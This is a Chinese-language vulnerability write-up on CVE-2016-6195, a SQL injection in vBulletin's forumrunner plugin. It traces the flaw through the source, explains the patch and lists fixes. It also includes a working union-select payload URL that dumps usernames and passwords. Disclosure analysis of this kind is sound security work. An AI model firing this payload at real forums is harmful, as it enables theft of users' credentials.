Author: janes(知道创宇404安全实验室)

Date: 2016-11-15

漏洞概述

漏洞简介

vBulletin 是一个商业论坛程序,使用PHP语言编写,有研究者发现VBulletin核心插件forumrunner存在SQL注入漏洞: CVE-2016-6195. 插件forumrunner默认开启, 利用该漏洞,攻击者能够利用SQL注入漏洞脱库。

漏洞影响

攻击者能够利用SQL注入漏洞脱库

影响版本

3.6.x ~ 4.2.1

4.2.2 ~ 4.2.2 Patch Level 5

4.2.3 ~ 4.2.3 Patch Level 1

漏洞分析

分析所用版本4.2.1

漏洞的本质是forumrunner/includes/moderation.php文件中, do_get_spam_data()函数()对参数postidsthreadid过滤不严导致SQL注入漏洞, 核心代码如下:

function do_get_spam_data (){
    global $vbulletin, $db, $vbphrase;

    $vbulletin->input->clean_array_gpc('r', array(
    'threadid' => TYPE_STRING,
    'postids' => TYPE_STRING,
    ));

    ...

    }else if ($vbulletin->GPC['postids'] != '') {
        $postids = $vbulletin->GPC['postids'];

        $posts = $db->query_read_slave("
            SELECT post.postid, post.threadid, post.visible, post.title, post.userid,
                thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid
            FROM " . TABLE_PREFIX . "post AS post
            LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
            WHERE postid IN ($postids)
        ");

VBulletin程序中并不直接使用$_GET等全局变量获取输入数据,而是使用clean_gpc()clean_array_gpc() 函数来过滤输入数据,而这两个函数并未对STRING类型做严格过滤,而传入的参数postids是作为SRING类型解析,参数postids随后拼接在SQL语句中进行查询,导致SQL注入漏洞。

寻找调用或包含do_get_spam_data()函数的代码,发现forumrunner/support/common_methods.php

    'get_spam_data' => array(
    'include' => 'moderation.php',
    'function' => 'do_get_spam_data',
    ),

继续回溯,发现forumrunner/request.php文件包含support/common_methods.php.

...

$processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING));
if (!$processed['cmd']) {
    return;
}

...

require_once(MCWD . '/support/common_methods.php');

...

if (!isset($methods[$processed['cmd']])) {
    json_error(ERR_NO_PERMISSION);
}

if ($methods[$processed['cmd']]['include']) {
    require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']);
}

if (isset($_REQUEST['d'])) {
    error_reporting(E_ALL);
}

$out = call_user_func($methods[$processed['cmd']]['function']);

...

上面代码中process_input()函数(forumrunner/support/utils.php), 会从$_REQUEST中取值,进行简单的类型转换,STRING类型则原样返回,根据上面代码,可以通过$_REQUEST['cmd']参数调用get_spam_data()函数, 进而调用do_get_spam_data()函数。设置$_REQUEST['d']参数将打开错误报告,有助于SQL注入,当然也可以不设置$_REQUEST['d']参数,这对触发SQL注入漏洞没有影响。剩下的就是使用postids参数构造SQL payload

postids参数注入

payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+

设置断点及变量取值,注入结果如下:

code

post

erro

从图中可以看出SQL注入语句执行成功,$post['title']变量已经获取了用户名和密码,其中forumid设置为1, 保证下面代码不会进入if条件判断语句中。

while ($post = $db->fetch_array($posts))
    {
        $forumperms = fetch_permissions($post['forumid']);
        if  (
            !($forumperms & $vbulletin->bf_ugp_forumpermissions['canview'])
                OR
            !($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads'])
                OR
            (!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid'])
            )
        {
            json_error(ERR_NO_PERMISSION);
        }

补丁分析

includes/general_vb.php文件, fr_clean_ids函数对id类变量进行了整数转换,从而阻止SQL注入攻击。

function fr_clean_ids($list = )
{
$arr = explode(,,$list);
$cleanarr = array_map(intval,$arr);
return implode(,,$cleanarr);
}

forumrunner/include/moderation.php文件, do_get_spam_data函数过滤$postids$threadid 参数

$vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]);

...

if ($vbulletin->GPC[‘threadid’] != ”) {
$threadids = $vbulletin->GPC[‘threadid’];

$threadids = fr_clean_ids($threadids);

...

修复方案

  1. 直接更新补丁 http://members.vbulletin.com/patches.php

  2. 更新VBulletin程序版本(>4.2.3)

reference

https://www.seebug.org/vuldb/ssvid-92354

https://enumerated.wordpress.com/2016/07/11/1/

http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/116/